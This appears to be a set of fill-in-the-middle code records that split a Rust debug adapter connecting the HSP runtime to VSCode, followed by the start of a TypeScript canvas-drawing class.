pub | r_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root);
let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names
.iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState {
file_path,
file_name: Some(file_name),
line,
stopped: true,
};
self.send_pause_event();
}
Action::AfterConnected => {
self.is_connected = true;
self.send_initialized_event();
}
Action::BeforeTerminating => {
self.send_event(dap::Event::Terminated { restart: false });
// サブワーカーを捨てる。
self.hsprt_sender.take();
self.connection_sender.take();
if let Some(_) = self.join_handle.take() {
// NOTE: なぜか終了しないので join しない。
// join_handle.join().unwrap();
}
}
Action::AfterDebugInfoLoaded(debug_info) => {
self.debug_info = Some(debug_info);
self.load_source_map();
}
Action::AfterGetVar { seq, variables } => {
self.send_response(seq, dap::Response::Variables { variables });
}
}
}
}
| fn from_va | identifier_name |
app.rs | use crate::connection;
use crate::debug_adapter_protocol as dap;
use crate::hsp_ext;
use crate::hsprt;
use crate::hspsdk;
use std;
use std::path::PathBuf;
use std::sync::mpsc;
use std::thread;
const MAIN_THREAD_ID: i64 = 1;
const MAIN_THREAD_NAME: &'static str = "main";
fn threads() -> Vec<dap::Thread> {
vec![dap::Thread {
id: MAIN_THREAD_ID,
name: MAIN_THREAD_NAME.to_owned(),
}]
}
/// グローバル変数からなるスコープの変数参照Id
const GLOBAL_SCOPE_REF: i64 = 1;
/// HSP の変数や変数の要素、あるいは変数をまとめるもの (モジュールなど) を指し示すもの。
#[derive(Clone, Debug)]
pub(crate) enum VarPath {
Globals,
Static(usize),
}
/// Variables reference. VSCode が変数や変数要素を指し示すために使う整数値。
pub(crate) type VarRef = i64;
impl VarPath {
pub fn to_var_ref(&self) -> VarRef {
match *self {
VarPath::Globals => 1,
VarPath::Static(i) => 2 + i as i64,
}
}
pub fn from_var_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root);
let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names
.iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => | {
file_path,
file_name: Some(file_name),
line,
stopped: true,
};
self.send_pause_event();
}
Action::AfterConnected => {
self.is_connected = true;
self.send_initialized_event();
}
Action::BeforeTerminating => {
self.send_event(dap::Event::Terminated { restart: false });
// サブワーカーを捨てる。
self.hsprt_sender.take();
self.connection_sender.take();
if let Some(_) = self.join_handle.take() {
// NOTE: なぜか終了しないので join しない。
// join_handle.join().unwrap();
}
}
Action::AfterDebugInfoLoaded(debug_info) => {
self.debug_info = Some(debug_info);
self.load_source_map();
}
Action::AfterGetVar { seq, variables } => {
self.send_response(seq, dap::Response::Variables { variables });
}
}
}
}
| {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState | identifier_body |
app.rs | use crate::connection;
use crate::debug_adapter_protocol as dap;
use crate::hsp_ext;
use crate::hsprt;
use crate::hspsdk;
use std;
use std::path::PathBuf;
use std::sync::mpsc;
use std::thread;
const MAIN_THREAD_ID: i64 = 1;
const MAIN_THREAD_NAME: &'static str = "main";
fn threads() -> Vec<dap::Thread> {
vec![dap::Thread {
id: MAIN_THREAD_ID,
name: MAIN_THREAD_NAME.to_owned(),
}]
}
/// グローバル変数からなるスコープの変数参照Id
const GLOBAL_SCOPE_REF: i64 = 1;
/// HSP の変数や変数の要素、あるいは変数をまとめるもの (モジュールなど) を指し示すもの。
#[derive(Clone, Debug)]
pub(crate) enum VarPath {
Globals,
Static(usize),
}
/// Variables reference. VSCode が変数や変数要素を指し示すために使う整数値。
pub(crate) type VarRef = i64;
impl VarPath {
pub fn to_var_ref(&self) -> VarRef {
match *self {
VarPath::Globals => 1,
VarPath::Static(i) => 2 + i as i64,
}
}
pub fn from_var_ref(r: VarRef) -> Option<Self> {
match r {
1 => Some(VarPath::Globals),
i if i >= 2 => Some(VarPath::Static((i - 2) as usize)),
_ => None,
}
}
}
#[derive(Clone, Debug)]
pub(crate) struct RuntimeState {
file_name: Option<String>,
file_path: Option<String>,
line: i32,
stopped: bool,
}
/// `Worker` が扱える操作。
#[derive(Clone, Debug)]
pub(crate) enum Action {
/// VSCode との接続が確立したとき。
AfterConnected,
/// VSCode からリクエストが来たとき。
AfterRequestReceived(dap::Msg),
/// assert で停止したとき。
AfterStopped(String, i32),
/// HSP ランタイムが終了する直前。
BeforeTerminating,
AfterDebugInfoLoaded(hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>),
AfterGetVar {
seq: i64,
variables: Vec<dap::Variable>,
},
}
/// `Worker` に処理を依頼するもの。
#[derive(Clone, Debug)]
pub(crate) struct Sender {
sender: mpsc::Sender<Action>,
}
impl Sender {
pub(crate) fn send(&self, action: Action) {
self.sender.send(action).map_err(|e| error!("{:?}", e)).ok();
}
}
/// HSP ランタイムと VSCode の仲介を行う。
pub(crate) struct Worker {
request_receiver: mpsc::Receiver<Action>,
connection_sender: Option<connection::Sender>,
hsprt_sender: Option<hsprt::Sender>,
is_connected: bool,
args: Option<dap::LaunchRequestArgs>,
state: RuntimeState,
debug_info: Option<hsp_ext::debug_info::DebugInfo<hsp_ext::debug_info::HspConstantMap>>,
source_map: Option<hsp_ext::source_map::SourceMap>,
#[allow(unused)]
join_handle: Option<thread::JoinHandle<()>>,
}
impl Worker {
pub fn new(hsprt_sender: hsprt::Sender) -> (Self, Sender) {
let (sender, request_receiver) = mpsc::channel::<Action>();
let app_sender = Sender { sender };
let (connection_worker, connection_sender) = connection::Worker::new(app_sender.clone());
let join_handle = thread::Builder::new()
.name("connection_worker".into())
.spawn(move || connection_worker.run())
.unwrap();
let worker = Worker {
request_receiver,
connection_sender: Some(connection_sender),
hsprt_sender: Some(hsprt_sender),
is_connected: false,
args: None,
state: RuntimeState {
file_path: None,
file_name: None,
line: 1,
stopped: false,
},
debug_info: None,
source_map: None,
join_handle: Some(join_handle),
};
(worker, app_sender)
}
fn is_launch_response_sent(&self) -> bool {
self.args.is_some()
}
pub fn run(mut self) {
self.connection_sender
.as_ref()
.unwrap()
.send(connection::Action::Connect);
loop {
match self.request_receiver.recv() {
Ok(action @ Action::BeforeTerminating) => {
self.handle(action);
break;
}
Ok(action) => {
self.handle(action);
continue;
}
Err(err) => {
error!("[app] {:?}", err);
break;
}
}
}
info!("[app] 終了");
}
/// HSP ランタイムが次に中断しているときにアクションが実行されるように予約する。
/// すでに停止しているときは即座に実行されるように、メッセージを送る。
fn send_to_hsprt(&self, action: hsprt::Action) {
if let Some(sender) = self.hsprt_sender.as_ref() {
sender.send(action, self.state.stopped);
}
}
fn send_response(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: true,
e: response,
}));
}
}
fn send_response_failure(&mut self, request_seq: i64, response: dap::Response) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Response {
request_seq,
success: false,
e: response,
}));
}
}
fn send_event(&self, event: dap::Event) {
if let Some(sender) = self.connection_sender.as_ref() {
sender.send(connection::Action::Send(dap::Msg::Event { e: event }));
}
}
fn send_initialized_event(&self) {
if self.is_connected && self.is_launch_response_sent() {
self.send_event(dap::Event::Initialized);
}
}
fn send_pause_event(&self) {
if self.state.stopped && self.is_launch_response_sent() {
self.send_event(dap::Event::Stopped {
reason: "pause".to_owned(),
thread_id: MAIN_THREAD_ID,
});
}
}
fn on_request(&mut self, seq: i64, request: dap::Request) {
match request {
dap::Request::Launch { args } => {
self.args = Some(args);
self.load_source_map();
self.send_response(seq, dap::Response::Launch);
self.send_initialized_event();
}
dap::Request::SetExceptionBreakpoints { .. } => {
self.send_response(seq, dap::Response::SetExceptionBreakpoints);
self.send_pause_event();
}
dap::Request::ConfigurationDone => {
self.send_response(seq, dap::Response::ConfigurationDone);
}
dap::Request::Threads => {
self.send_response(seq, dap::Response::Threads { threads: threads() })
}
dap::Request::Source { source } => {
match source.and_then(|source| Some(std::fs::read_to_string(source.path?).ok()?)) {
Some(content) => self.send_response(seq, dap::Response::Source { content }),
None => self.send_response_failure(
seq,
dap::Response::Source {
content: "".to_owned(),
},
),
}
}
dap::Request::StackTrace { .. } => {
if self.state.file_path.is_none() {
let file_path = self
.state
.file_name
.as_ref()
.and_then(|file_name| self.resolve_file_path(file_name));
self.state.file_path = file_path;
}
let stack_frames = vec![dap::StackFrame {
id: 1,
name: "main".to_owned(),
line: std::cmp::max(1, self.state.line) as usize,
source: dap::Source {
name: "main".to_owned(),
path: self.state.file_path.to_owned(),
},
}];
self.send_response(seq, dap::Response::StackTrace { stack_frames });
}
dap::Request::Scopes { .. } => {
let scopes = vec![dap::Scope {
name: "グローバル".to_owned(),
variables_reference: GLOBAL_SCOPE_REF,
expensive: true,
}];
self.send_response(seq, dap::Response::Scopes { scopes });
}
dap::Request::Variables {
variables_reference,
} => {
if let Some(var_path) = VarPath::from_var_ref(variables_reference) {
self.send_to_hsprt(hsprt::Action::GetVar { seq, var_path });
}
}
dap::Request::Pause { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STOP as hspsdk::DebugMode,
));
self.send_response(
seq,
dap::Response::Pause {
thread_id: MAIN_THREAD_ID,
},
);
}
dap::Request::Continue { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_RUN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Continue);
self.send_event(dap::Event::Continued {
all_threads_continued: true,
});
self.state.stopped = false;
}
dap::Request::Next { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::Next);
}
dap::Request::StepIn { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepIn);
}
dap::Request::StepOut { .. } => {
self.send_to_hsprt(hsprt::Action::SetMode(
hspsdk::HSPDEBUG_STEPIN as hspsdk::DebugMode,
));
self.send_response(seq, dap::Response::StepOut);
}
dap::Request::Disconnect { .. } => {
self.send_to_hsprt(hsprt::Action::Disconnect);
}
}
}
fn load_source_map(&mut self) {
if self.source_map.is_some() {
return;
}
let debug_info = match self.debug_info {
None => return,
Some(ref debug_info) => debug_info,
};
let args = match self.args {
None => return,
Some(ref args) => args,
};
let root = PathBuf::from(&args.root);
let mut source_map = hsp_ext::source_map::SourceMap::new(&root); | .iter()
.map(|name| name.as_str())
.collect::<Vec<&str>>(),
);
self.source_map = Some(source_map);
}
/// ファイル名を絶対パスにする。
/// FIXME: common 以下や 無修飾 include パスに対応する。
fn resolve_file_path(&self, file_name: &String) -> Option<String> {
if file_name == "???" {
return None;
}
let source_map = self.source_map.as_ref()?;
let full_path = source_map.resolve_file_name(file_name)?;
Some(full_path.to_str()?.to_owned())
}
fn handle(&mut self, action: Action) {
debug!("[app] {:?}", action);
match action {
Action::AfterRequestReceived(dap::Msg::Request { seq, e }) => {
self.on_request(seq, e);
}
Action::AfterRequestReceived(_) => {
warn!("[app] リクエストではない DAP メッセージを無視");
}
Action::AfterStopped(file_name, line) => {
let file_path = self.resolve_file_path(&file_name);
self.state = RuntimeState {
file_path,
file_name: Some(file_name),
line,
stopped: true,
};
self.send_pause_event();
}
Action::AfterConnected => {
self.is_connected = true;
self.send_initialized_event();
}
Action::BeforeTerminating => {
self.send_event(dap::Event::Terminated { restart: false });
// サブワーカーを捨てる。
self.hsprt_sender.take();
self.connection_sender.take();
if let Some(_) = self.join_handle.take() {
// NOTE: なぜか終了しないので join しない。
// join_handle.join().unwrap();
}
}
Action::AfterDebugInfoLoaded(debug_info) => {
self.debug_info = Some(debug_info);
self.load_source_map();
}
Action::AfterGetVar { seq, variables } => {
self.send_response(seq, dap::Response::Variables { variables });
}
}
}
} | let file_names = debug_info.file_names();
source_map.add_search_path(PathBuf::from(&args.program).parent());
source_map.add_file_names(
&file_names | random_line_split |
CanvasState.ts | import Shape from './Shape'
import * as $ from 'jquery'
export default class CanvasState {
canvas:any;
width:number;
height:number;
ctx:any;
stylePaddingLeft:number;
stylePaddingTop:number;
styleBorderLeft:number;
styleBorderTop:number;
htmlTop : number;
htmlLeft:number;
valid:boolean;
alert:boolean;
dragging:boolean;
drawing:boolean;
selection: any;
dragoffx:number;
dragoffy:number;
drawingoffx:number;
drawingoffy:number;
shapes:Array<Shape>;
selectionColor:string;
selectionWidth:number;
interval:number;
imageObj:any;
border:number;
scale:number;
handleParentScroll:boolean;
onAddShape: (shape:Shape) => void;
constructor(canvas) {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
